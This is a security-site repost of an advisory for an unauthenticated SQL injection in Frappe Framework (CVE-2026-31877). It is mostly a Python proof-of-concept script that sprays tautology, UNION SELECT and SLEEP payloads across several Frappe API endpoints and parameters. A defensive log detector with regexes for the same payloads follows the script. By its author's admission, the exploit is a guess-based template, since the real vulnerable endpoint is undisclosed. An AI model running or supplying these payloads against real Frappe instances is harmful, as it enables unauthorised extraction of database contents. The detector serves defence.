Frappe Framework < 14.99.0 and < 15.84.0 Unauthenticated SQL Injection
Summary: Frappe Framework has an unauthenticated SQL injection vulnerability (CVE-2026-31877) affecting versions below 14.99.0 and below 15.84.0. An attacker can extract sensitive database information through API endpoints whose input is not sanitized correctly. Fixed in 14.99.0 and 15.84.0.

2026-3-14 22:34:17 Author: cxsecurity.com

Frappe Framework <14.99.0 and <15.84.0 Unauthenticated SQL Injection

```python
#!/usr/bin/env python3
# Exploit Title: Frappe Framework Unauthenticated SQL Injection
# CVE: CVE-2026-31877
# Date: 2026-03-11
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://frappeframework.com
# Software Link: https://github.com/frappe/frappe
# Affected: Frappe Framework <14.99.0 and <15.84.0
# Tested on: Frappe Framework 15.x (vulnerable versions)
# Category: Webapps
# Platform: Linux / Web
# Exploit Type: Remote SQL Injection
# CVSS: 9.3 (CRITICAL)
# CWE: CWE-89
# Description: Unauthenticated SQL injection via improper field sanitization in certain API
#              endpoints allows extraction of sensitive database information.
# Fixed in: 14.99.0 / 15.84.0
# Usage: python3 exploit.py <target>
#
# Examples:
#   python3 exploit.py http://192.168.1.100:8000
#
# Options:
#
# Notes: This is a template PoC. The exact vulnerable parameter/endpoint remains undisclosed
#        in the public advisory (GHSA-2c4m-999q-xhx4). Tests common historical Frappe
#        injection points. Use only on systems you own or have explicit permission to test.
#
# How to Use
#
# Step 1: Run against a vulnerable instance (non-production only)

import argparse
import time

import requests
import urllib3

# The original script opens with a box-drawing ASCII-art banner that did not survive
# extraction; only the text it carried is kept here.
print(r"""
    b a n y a m e r _ s e c u r i t y
    >>> Silent Hunter • Shadow Presence <<<
    Operator : Mohammed Idrees Banyamer  Jordan
    Handle   : @banyamer_security
    CVE-2026-31877 • Frappe SQL Injection (Unauthenticated)
""")

# Requests are sent with verify=False; silence the per-request TLS warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Substrings (compared against the lowercased body) that suggest a database error
# leaked into the response. "odbc" was written in upper case originally and so could
# never match a lowercased body; the rest are kept as the author chose them, broad
# terms such as "table" and "column" included, so expect false positives.
ERROR_INDICATORS = [
    "syntax error",
    "mysql",
    "sql",
    "near",
    "you have an error",
    "odbc",
    "quoted_string",
    "unclosed quotation",
    "table",
    "column",
]


def test_sqli(base_url, endpoint, param, payload):
    """POST one payload in one JSON parameter; report error-based or time-based signals."""
    full_url = f"{base_url.rstrip('/')}{endpoint}"
    data = {param: payload}
    print(f"[*] Testing {full_url} → {param} = {payload[:60]}...")
    try:
        start = time.time()
        r = requests.post(full_url, json=data, timeout=12, verify=False)
        elapsed = time.time() - start
        body = r.text.lower()
        # Error-based signal: a database error string appears in the response.
        error_based = any(ind in body for ind in ERROR_INDICATORS)
        # Time-based signal: the SLEEP(5) payloads should delay the response by ~5 s.
        time_based = elapsed > 5
        if error_based or time_based:
            print(f"[!!!] Possible SQLi – response code {r.status_code}")
            print(f"      Time: {elapsed:.2f}s")
            print(f"      Snippet: {r.text[:400]}...")
            return True
        print(f"    → No obvious injection (code {r.status_code}, len={len(r.text)})")
        return False
    except Exception as e:
        print(f"    → Request failed: {e}")
        return False


def main(target):
    # Historical Frappe endpoints that build queries from caller-supplied fields.
    common_endpoints = [
        "/api/method/frappe.desk.reportview.get",
        "/api/method/frappe.model.db_query.get_list",
        "/api/method/frappe.client.get_list",
        "/api/method/frappe.desk.query_report.run",
        "/api/resource/User",
        "/api/method/frappe.search.search_link",
        "/api/method/frappe.desk.form.load.getdoc",
    ]
    # Parameters those endpoints have historically passed into query construction.
    common_params = [
        "filters",
        "or_filters",
        "fields",
        "order_by",
        "group_by",
        "with_parent",
        "parent_doctype",
        "txt",
    ]
    payloads = [
        "' OR '1'='1",
        "') OR ('1'='1",
        "' OR 1=1 -- ",
        "1' UNION SELECT database(),user(),version() -- ",
        "'; SELECT SLEEP(5) -- ",
        "1' AND SLEEP(5) -- ",
    ]
    print(f"[+] Target: {target}\n")
    found = False
    for ep in common_endpoints:
        for p in common_params:
            for payload in payloads:
                if test_sqli(target, ep, p, payload):
                    print("[+] Possible vulnerable combination:")
                    print(f"    Endpoint: {ep}")
                    print(f"    Param: {p}")
                    print(f"    Payload: {payload}")
                    found = True
    if not found:
        print("\n[-] No injection detected with these common patterns.")
        print("    → Either patched / not vulnerable, or different endpoint/param.")
        print("    → Wait for public details or analyze source diff yourself.")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2026-31877 Frappe SQLi PoC template")
    parser.add_argument("target", help="Base URL, e.g. http://192.168.1.50:8000")
    args = parser.parse_args()
    if not args.target.startswith(("http://", "https://")):
        args.target = "http://" + args.target
    try:
        main(args.target)
    except KeyboardInterrupt:
        print("\n[!] Stopped by user.")
    except Exception as e:
        print(f"\n[!] Fatal error: {e}")
```
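As an added defensive counterpart to the PoC template above (not part of the original advisory and not Frappe's code), the detector below scans request logs for the same endpoint, parameter and payload families the template sprays, and ranks unauthenticated (Guest) hits highest. The JSON log format and the sample lines are constructed for this example; a real deployment would feed it body-capturing reverse-proxy or WAF logs.

```python
import json
import re

# Frappe API endpoints the PoC above probes, and the parameters it sprays payloads into.
WATCHED_ENDPOINTS = {
    "/api/method/frappe.desk.reportview.get",
    "/api/method/frappe.model.db_query.get_list",
    "/api/method/frappe.client.get_list",
    "/api/method/frappe.desk.query_report.run",
}
WATCHED_PARAMS = {"filters", "or_filters", "fields", "order_by", "group_by", "txt"}
# One regex per payload family in the PoC: tautology, UNION read, time-based, comment tail.
SIGNATURES = [
    ("tautology", re.compile(r"'\s*\)?\s*or\s*\(?\s*'?1'?\s*=\s*'?1", re.I)),
    ("union_select", re.compile(r"\bunion\s+select\b", re.I)),
    ("time_based", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("comment_tail", re.compile(r"--\s|;\s*--")),
]
# Constructed request-log lines: one JSON object per request, body captured at a proxy.
SAMPLE_LOG = """
{"src":"203.0.113.7","user":"Guest","path":"/api/method/frappe.client.get_list","body":{"doctype":"User","filters":"' OR '1'='1"}}
{"src":"203.0.113.7","user":"Guest","path":"/api/method/frappe.desk.reportview.get","body":{"doctype":"User","order_by":"1' AND SLEEP(5) -- "}}
{"src":"198.51.100.4","user":"admin@example.com","path":"/api/method/frappe.client.get_list","body":{"doctype":"ToDo","filters":[["status","=","Open"]]}}
{"src":"198.51.100.4","user":"admin@example.com","path":"/api/resource/User","body":{}}
""".strip().splitlines()

def classify(event: dict) -> list:
    """Return the 'param:signature' pairs that fire on one request; [] means nothing suspicious."""
    hits: list = []
    if event.get("path") not in WATCHED_ENDPOINTS:
        return hits
    for param, value in (event.get("body") or {}).items():
        if param not in WATCHED_PARAMS:
            continue
        # Legitimate Frappe filters arrive as nested lists; serialise so the regexes see text.
        text = value if isinstance(value, str) else json.dumps(value)
        hits.extend(f"{param}:{name}" for name, rx in SIGNATURES if rx.search(text))
    return hits

def scan(lines: list) -> list:
    """Parse JSON request-log lines; return one alert per request with at least one hit."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        hits = classify(event)
        if hits:
            # An unauthenticated (Guest) probe matches the CVE's precondition, so rank it higher.
            severity = "high" if event.get("user") == "Guest" else "medium"
            alerts.append({"src": event["src"], "path": event["path"], "hits": hits, "severity": severity})
    return alerts
```

Running `scan(SAMPLE_LOG)` yields two high-severity alerts for the Guest probes and nothing for the authenticated, well-formed filter list.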

References:

https://github.com/frappe/frappe/security/advisories/GHSA-2c4m-999q-xhx4






Source: https://cxsecurity.com/issue/WLB-2026030018